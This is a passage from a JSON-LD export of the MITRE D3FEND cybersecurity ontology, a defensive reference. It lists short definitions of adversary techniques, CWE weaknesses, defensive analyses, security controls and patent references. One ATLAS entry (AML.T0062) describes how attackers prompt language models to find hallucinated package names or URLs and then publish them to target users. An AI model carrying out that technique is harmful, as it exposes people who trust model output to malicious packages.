      "rdfs:label": "Cyber Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Technique"
        },
        {
          "@id": "_:N9b125176c5554f78abe3c4a75f6f6032"
        }
      ]
    },
    {
      "@id": "_:N9b125176c5554f78abe3c4a75f6f6032",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implemented-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Procedure"
      }
    },
    {
      "@id": "d3f:T1588.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.007",
      "d3f:definition": "Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)",
      "rdfs:label": "Artificial Intelligence",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:Organization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An organization with a defined mission/goal and a defined boundary, using systems to execute that mission, and with responsibility for managing its own risks and performance. An enterprise may consist of all or some of the following business aspects: acquisition, program management, human resources, financial management, security, and systems, information and mission management",
      "rdfs:label": "Organization",
      "rdfs:seeAlso": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentGroup"
        },
        {
          "@id": "d3f:Non-PersonEntity"
        },
        {
          "@id": "_:Nc2a520c67e55427c8eff969e79240579"
        }
      ]
    },
    {
      "@id": "_:Nc2a520c67e55427c8eff969e79240579",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-member"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Person"
      }
    },
    {
      "@id": "d3f:CWE-1126",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1126",
      "d3f:definition": "The source code declares a variable in one scope, but the variable is only used within a narrower scope.",
      "rdfs:label": "Declaration of Variable with Unnecessarily Wide Scope",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:FileHeaderBlockContent",
      "@type": "owl:Class",
      "d3f:definition": "The content of a header block not including the signature.",
      "rdfs:label": "File Header Block Content",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:AML.T0008.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.001",
      "d3f:definition": "Adversaries may acquire consumer hardware to conduct their attacks.\nOwning the hardware provides the adversary with complete control of the environment. These devices can be hard to trace.",
      "rdfs:label": "Consumer Hardware - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "Consumer Hardware"
    },
    {
      "@id": "d3f:FileHash",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A File Hash is a fixed-length, unique digital fingerprint generated by applying a cryptographic hash function to the contents of a file.",
      "d3f:identifies": {
        "@id": "d3f:File"
      },
      "rdfs:label": "File Hash",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalFingerprint"
        },
        {
          "@id": "_:N21bae94beb40452793670ec286e036b0"
        }
      ]
    },
    {
      "@id": "_:N21bae94beb40452793670ec286e036b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Reference-NetworkFirewallWithProxy_SecureComputingLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/GB2318031A"
      },
      "d3f:kb-abstract": "A proxy which is part of a firewall controls exchanges of information between two application entities. The proxy interrogates attempts to establish a communication session by requesting entities with a server entity in lower layers in accordance with defined authentication procedures. The Proxy interfaces with networking software to direct a communication stack to monitor connection requests to any address on specific ports. The requestor's address, and the server's address are checked against a access control list. If either address is invalid, the proxy closes the connection. If both are valid, a new connection is setup such that both the requestor and server are transparently connected to the proxy with variable higher levels being connected in a relay mode. Protocol data units are interrogated for conformance to a protocol session, and optionally further decoded to add additional application specific filtering. In one embodiment, an OSI architecture comprises the levels.",
      "d3f:kb-author": "Michael W Green, Ricky Ronald Kruse",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Secure Computing LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Network firewall with proxy",
      "rdfs:label": "Reference - Network firewall with proxy - Secure Computing LLC"
    },
    {
      "@id": "d3f:URLAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:URLAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:URL"
      },
      "d3f:d3fend-id": "D3-UA",
      "d3f:definition": "Determining if a URL is benign or malicious by analyzing the URL or its components.",
      "d3f:kb-article": "## How it works\n\nURLs may contain components, for example:\n\n * scheme\n * userinfo\n * host name\n * port\n * path\n * query\n * fragment\n\nThese components are used as features in analysis algorithms.\n\nContextual information about a URL such as where it is embedded (ex. emails, files, network protocols), header, path, location, and origin information, as well as information about the content returned from the URL request, may be incorporated into an analytic for URL analysis. For example, if a URL indicates a .pdf file but an executable is actually returned, the combination of these two pieces of information indicates suspicious activity.\n\nAdditional techniques include:\n\n* Extracting features of a URL such as domain name length, ratio of consecutive consonants, percentage of digits in a domain, and number of vowels. Values for each feature are combined to develop a score for the URL.\n* Determining the probability of a character occurring in the URL given the preceding two characters. For example, for google.com, the probability of a 'g' occurring at the beginning of a word, the probability of an 'o' occurring after a \"g, the probability of an o\" occurring after a 'g' and \"o, and so forth. A dictionary or a list of known good domains is used to determine probability. Probabilities are multiplied to develop a score for the URL.\n\nURL analysis may trigger follow-on analytics such as **File Analysis**\n\n## Considerations\n\n* Volume of URLs being analyzed, combined with the speed at which they are analyzed\n* Fidelity of analysis technique at detecting brand new URLs versus analyzing URLs of established domains",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForDetectingMaliciousWebsites_EndgameInc"
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingRestrictedContentAssociatedWithRetrievedContent_SophosLtd"
        }
      ],
      "rdfs:label": "URL Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "_:Nf6ad2de1012f47109482d2a391e1630e"
        }
      ]
    },
    {
      "@id": "_:Nf6ad2de1012f47109482d2a391e1630e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:EX-0008",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0008",
      "d3f:definition": "Malicious logic is arranged to run at precise times derived from onboard clocks or distributed time sources. The trigger may be absolute or relative. Spacecraft commonly maintain multiple clocks and counters and schedule autonomous sequences against them. An attacker leverages this machinery to ensure effects occur during tactically advantageous windows. Time-based execution reduces exposure, simplifies coordination across assets, and makes reproduction difficult in lab settings that lack the same temporal context.",
      "rdfs:label": "Time Synchronized Execution - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0008/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Time Synchronized Execution"
    },
    {
      "@id": "d3f:Reference-StackSmashingProtection_StackGuard_RedHat",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://access.redhat.com/blogs/766093/posts/3548631"
      },
      "d3f:kb-abstract": "In our previous blog, we saw how arbitrary code execution resulting from stack-buffer overflows can be partly mitigated by marking segments of memory as non-executable, a technology known as Execshield. However stack-buffer overflow exploits can still effectively overwrite the function return address, which leads to several interesting exploitation techniques like ret2libc, ret2gets, and ret2plt. With all of these methods, the function return address is overwritten and attacker controlled code is executed when the program control transfers to overwritten address on the stack.",
      "d3f:kb-author": "Huzaifa Sidhpurwala",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Red Hat",
      "d3f:kb-reference-of": {
        "@id": "d3f:StackFrameCanaryValidation"
      },
      "d3f:kb-reference-title": "Security Technologies: Stack Smashing Protection (StackGuard)",
      "rdfs:label": "Reference - Security Technologies: Stack Smashing Protection (StackGuard) - Red Hat"
    },
    {
      "@id": "d3f:CWE-1044",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1044",
      "d3f:definition": "The product's architecture contains too many - or too few - horizontal layers.",
      "rdfs:label": "Architecture with Number of Horizontal Layers Outside of Expected Range",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CCI-002353_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system transmits organization-defined access authorization information using organization-defined security safeguards to organization-defined information systems which enforce access control decisions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002353"
    },
    {
      "@id": "d3f:Reference-CertificateAndPublicKeyPinning",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning"
      },
      "d3f:kb-abstract": "Certificate and Public Key Pinning technical guide to implementing certificate and public key pinning.",
      "d3f:kb-author": "OWASP",
      "d3f:kb-organization": "OWASP",
      "d3f:kb-reference-of": {
        "@id": "d3f:CertificatePinning"
      },
      "d3f:kb-reference-title": "Certificate and Public Key Pinning",
      "rdfs:label": "Reference - Certificate and Public Key Pinning"
    },
    {
      "@id": "d3f:AML.T0095",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0095",
      "d3f:definition": "Adversaries may search public websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or domains owned by the victim.\n\nAdversaries may find the information they seek to gather via search engines. They can use precise search queries to identify software platforms or services used by the victim to use in targeting. This may be followed by [Exploit Public-Facing Application](/techniques/AML.T0049) or [Prompt Infiltration via Public-Facing Application](/techniques/AML.T0093).",
      "rdfs:label": "Search Open Websites/Domains - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0095"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Open Websites/Domains"
    },
    {
      "@id": "d3f:OutboundInternetFileTransferTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:File"
      },
      "d3f:definition": "Outbound internet file transfer traffic is file transfer traffic that is: (a) on an outgoing connection initiated from a host within a network to a host outside the network, and (b) using a standard file transfer protocol.",
      "rdfs:label": "Outbound Internet File Transfer Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:File_transfer"
        },
        {
          "@id": "dbr:Internetworking"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileTransferNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundNetworkTraffic"
        },
        {
          "@id": "_:N23996b66b9a74773959d3740c75c66cd"
        }
      ]
    },
    {
      "@id": "_:N23996b66b9a74773959d3740c75c66cd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-510",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-510",
      "d3f:definition": "A trapdoor is a hidden piece of code that responds to a special input, allowing its user access to resources without passing through the normal security enforcement mechanism.",
      "rdfs:label": "Trapdoor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-506"
      }
    },
    {
      "@id": "d3f:T1218.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.001",
      "d3f:definition": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)",
      "d3f:invokes": [
        {
          "@id": "d3f:CreateFile"
        },
        {
          "@id": "d3f:CreateProcess"
        }
      ],
      "rdfs:label": "Compiled HTML File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:N98efe92086f14930a9bad23ac9f7afc3"
        },
        {
          "@id": "_:N8e1d1f40ae13488aa4a405fd4271ab64"
        }
      ]
    },
    {
      "@id": "_:N98efe92086f14930a9bad23ac9f7afc3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateFile"
      }
    },
    {
      "@id": "_:N8e1d1f40ae13488aa4a405fd4271ab64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:d3fend-display-annotation",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "d3fend-display-annotation",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:signs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x signs y: The entity x applies a digital signature to the digital artifact y, thereby asserting its validity, integrity, and authenticity. Typically, this involves cryptographic techniques to securely bind the signature to y, ensuring that y's contents have not been altered and are authentic as endorsed by x.",
      "rdfs:label": "signs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:validates"
      }
    },
    {
      "@id": "d3f:CWE-1244",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1244",
      "d3f:definition": "The product uses physical debug or test interfaces with support for multiple access levels, but it assigns the wrong debug access level to an internal asset, providing unintended access to the asset from untrusted debug agents.",
      "rdfs:label": "Internal Asset Exposed to Unsafe Debug Access Level or State",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-863"
      }
    },
    {
      "@id": "d3f:has-dependent",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-dependent y: The entity x is relied upon or required by entity y.",
      "rdfs:label": "has-dependent",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyExportEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the export of registry key data from the Windows Registry to an external file or format.",
      "rdfs:label": "Windows Registry Key Export Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:Nac33a23c46924e36ab219da564a1d5be"
        }
      ]
    },
    {
      "@id": "_:Nac33a23c46924e36ab219da564a1d5be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:Reference-ExecutionWithSchtasks_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-08-001/"
      },
      "d3f:kb-abstract": "The Windows built-in tool schtasks.exe provides the creation, modification, and running of scheduled tasks on a local or remote computer. It is provided as a more flexible alternative to at.exe, described in CAR-2013-05-004. Although used by adversaries, the tool is also legitimately used by administrators, scripts, and software configurations. The scheduled tasks tool can be used to gain Persistence and can be used in combination with a Lateral Movement technique to remotely gain execution. Additionally, the command has parameters to specify the user and password responsible for creating the task, as well as the user and password combination that the task will run as. The /s flag will cause a task to run as the SYSTEM user, usually indicating privilege escalation.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ScheduledJobAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-08-001: Execution with schtasks",
      "rdfs:label": "Reference - CAR-2013-08-001: Execution with schtasks - MITRE"
    },
    {
      "@id": "d3f:DigitalInformationBearer",
      "@type": "owl:Class",
      "d3f:definition": "A digital information bearer is a physical or virtual entity that stores, transmits, or processes digital information.",
      "rdfs:label": "Digital Information Bearer",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:CWE-1048",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1048",
      "d3f:definition": "The code contains callable control elements that contain an excessively large number of references to other application objects external to the context of the callable, i.e. a Fan-Out value that is excessively large.",
      "rdfs:label": "Invokable Control Element with Large Number of Outward Calls",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:Reference-MethodOfMakingThinAtomicZGradeShields",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20110296412A1"
      },
      "d3f:kb-abstract": "A radiation-shielded structural enclosure is formed from layers of material having higher and lower Z (atomic) numbers. The enclosure may be formed from layers of titanium that are bonded to opposite sides of a layer of tantalum. A layer of aluminum alloy may be bonded to at least one of the layers of titanium. The enclosure provides structural support for components disposed inside the enclosure and provides radiation shielding for the components.",
      "d3f:kb-author": "Donald L. Thomsen, III",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "NASA",
      "d3f:kb-reference-of": {
        "@id": "d3f:RadiationHardening"
      },
      "d3f:kb-reference-title": "A Method of making thin atomic (Z) grade shields",
      "rdfs:label": "Reference - Method of making thin atomic (Z) grade shields - NASA"
    },
    {
      "@id": "d3f:PageFrame",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contained-by": {
        "@id": "d3f:PrimaryStorage"
      },
      "d3f:definition": "A page frame is the smallest fixed-length contiguous block of physical memory into which memory pages are mapped by the operating system.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Page_(computer_memory)"
      },
      "rdfs:label": "Page Frame",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryBlock"
        },
        {
          "@id": "_:N28abbb5386ef4dacb196b49c21290db5"
        }
      ]
    },
    {
      "@id": "_:N28abbb5386ef4dacb196b49c21290db5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contained-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrimaryStorage"
      }
    },
    {
      "@id": "d3f:CWE-378",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-378",
      "d3f:definition": "Opening temporary files without appropriate measures or controls can leave the file, its contents and any function that it impacts vulnerable to attack.",
      "rdfs:label": "Creation of Temporary File With Insecure Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-377"
      }
    },
    {
      "@id": "d3f:OSAPITraceProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that enables a program to monitor, control, or interact with the execution of a process.",
      "d3f:invokes": {
        "@id": "d3f:TraceProcess"
      },
      "rdfs:label": "OS API Trace Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Na1ffae9b16824a5a9e6586c6af45fbd1"
        }
      ]
    },
    {
      "@id": "_:Na1ffae9b16824a5a9e6586c6af45fbd1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TraceProcess"
      }
    },
    {
      "@id": "d3f:CWE-843",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-843",
      "d3f:definition": "The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.",
      "d3f:synonym": "Object Type Confusion",
      "rdfs:label": "Access of Resource Using Incompatible Type ('Type Confusion')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-704"
      }
    },
    {
      "@id": "d3f:ComputeDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the operation, state, or performance of computational hardware, such as CPUs, GPUs, or accelerators. These events reflect processing capacity changes, utilization anomalies, or device health.",
      "rdfs:label": "Compute Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N5d0bda3dfc5a4ce38d148b5950c1a3f8"
        }
      ]
    },
    {
      "@id": "_:N5d0bda3dfc5a4ce38d148b5950c1a3f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Processor"
      }
    },
    {
      "@id": "d3f:CWE-231",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-231",
      "d3f:definition": "The product does not handle or incorrectly handles when more values are provided than expected.",
      "rdfs:label": "Improper Handling of Extra Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-229"
      }
    },
    {
      "@id": "d3f:DigitalAudioVisualMedia",
      "@type": "owl:Class",
      "d3f:definition": "Audiovisual (AV) is electronic media possessing both a sound and a visual component.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Audiovisual",
      "rdfs:label": "Digital Audio Visual Media",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMultimedia"
      }
    },
    {
      "@id": "d3f:DE-0009.02",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.02",
      "d3f:definition": "The adversary aligns operations with heightened solar/geomagnetic activity so effects resemble natural disturbances. During storms, receivers struggle with scintillation and increased noise; SEUs and resets rise; navigation and timing degrade; and operators expect anomalies. By conducting EMI, spoofing, or timing-sensitive sequences within these windows, the attacker benefits from ambient interference and plausible attribution to space weather. Telemetry gaps, link fades, or transient upsets appear consistent with the environment, delaying suspicion that a deliberate action occurred.",
      "rdfs:label": "Space Weather - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Space Weather"
    },
    {
      "@id": "d3f:CWE-1431",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1431",
      "d3f:definition": "The product uses a hardware module implementing a cryptographic algorithm that writes sensitive information about the intermediate state or results of its cryptographic operations via one of its output wires (typically the output port containing the final result).",
      "rdfs:label": "Driving Intermediate Cryptographic State/Results to Hardware Module Outputs",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:CCI-001991_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for PKI-based authentication, implements a local cache of revocation data to support path discovery and validation in case of inability to access revocation information via the network.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Certificate-basedAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001991"
    },
    {
      "@id": "d3f:T1550",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:AuthenticationService"
      },
      "d3f:attack-id": "T1550",
      "d3f:definition": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.",
      "rdfs:label": "Use Alternate Authentication Material",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:Nc1cc5a8f46e044a7bd221f4fe1751b44"
        }
      ]
    },
    {
      "@id": "_:Nc1cc5a8f46e044a7bd221f4fe1751b44",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "d3f:ScriptExecutionAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ScriptExecutionAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:ScriptApplicationProcess"
      },
      "d3f:d3fend-id": "D3-SEA",
      "d3f:definition": "Analyzing the execution of a script to detect unauthorized user activity.",
      "d3f:kb-article": "## How it works\nSoftware installed on the host system hooks into a scripting engine to intercept commands before they are executed and block commands if they are determined to be harmful. Pattern matching is used to identify unauthorized commands or in the case of script files, a hash of the file is compared against hashes of known unauthorized script files.\n\n## Considerations\nList of known unauthorized script files or regular expression patterns must be kept up to date to ensure detection of new threats.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DetectingScript-basedMalware_CrowdstrikeInc"
      },
      "rdfs:label": "Script Execution Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N61087eab5b824057a99567c153612292"
        }
      ]
    },
    {
      "@id": "_:N61087eab5b824057a99567c153612292",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScriptApplicationProcess"
      }
    },
    {
      "@id": "d3f:TranslationLookasideBuffer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A translation lookaside buffer (TLB) is a memory cache that is used to reduce the time taken to access a user memory location. It is a part of the chip's memory-management unit (MMU).",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Translation_lookaside_buffer"
      },
      "rdfs:label": "Translation Lookaside Buffer",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryManagementUnitComponent"
      }
    },
    {
      "@id": "d3f:AML.T0062",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0062",
      "d3f:definition": "Adversaries may prompt large language models and identify hallucinated entities.\nThey may request software packages, commands, URLs, organization names, or e-mail addresses, and identify hallucinations with no connected real-world source. Discovered hallucinations provide the adversary with potential targets to [Publish Hallucinated Entities](/techniques/AML.T0060). Different LLMs have been shown to produce the same hallucinations, so the hallucinations exploited by an adversary may affect users of other LLMs.",
      "rdfs:label": "Discover LLM Hallucinations - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0062"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover LLM Hallucinations"
    },
    {
      "@id": "d3f:SourceCodeReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Source Code",
      "rdfs:label": "Source Code Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-17_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:control-name": "Remote Access | Disable Nonsecure Network Protocols",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-17(8)"
    },
    {
      "@id": "d3f:Alias",
      "@type": "owl:Class",
      "d3f:definition": "In macOS, an alias is a small file that represents another object in a local, remote, or removable[1] file system and provides a dynamic link to it; the target object may be moved or renamed, and the alias will still link to it (unless the original file is recreated; such an alias is ambiguous and how it is resolved depends on the version of macOS).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Alias_(Mac_OS)"
      },
      "rdfs:label": "Alias",
      "rdfs:subClassOf": {
        "@id": "d3f:SlowSymbolicLink"
      }
    },
    {
      "@id": "d3f:Reference-AutomatedComputerVulnerabilityResolutionSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7308712B2"
      },
      "d3f:kb-abstract": "A system and process for addressing computer security vulnerabilities. The system and process generally comprise aggregating vulnerability information on a plurality of computer vulnerabilities; constructing a remediation database of said plurality of computer vulnerabilities; constructing a remediation signature to address the computer vulnerabilities; and deploying said remediation signature to a client computer. The remediation signature essentially comprises a sequence of actions to address a corresponding vulnerability. A managed automated approach to the process is contemplated in which the system is capable of selective deployment of remediation signatures; selective resolution of vulnerabilities; scheduled deployment of remediation signatures; and scheduled scanning of client computers for vulnerabilities.",
      "d3f:kb-author": "Carl E. Banzhof",
      "d3f:kb-organization": "McAfee LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:AssetVulnerabilityEnumeration"
      },
      "d3f:kb-reference-title": "Automated computer vulnerability resolution system",
      "rdfs:label": "Reference - Automated computer vulnerability resolution system"
    },
    {
      "@id": "d3f:T1559.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1559.001",
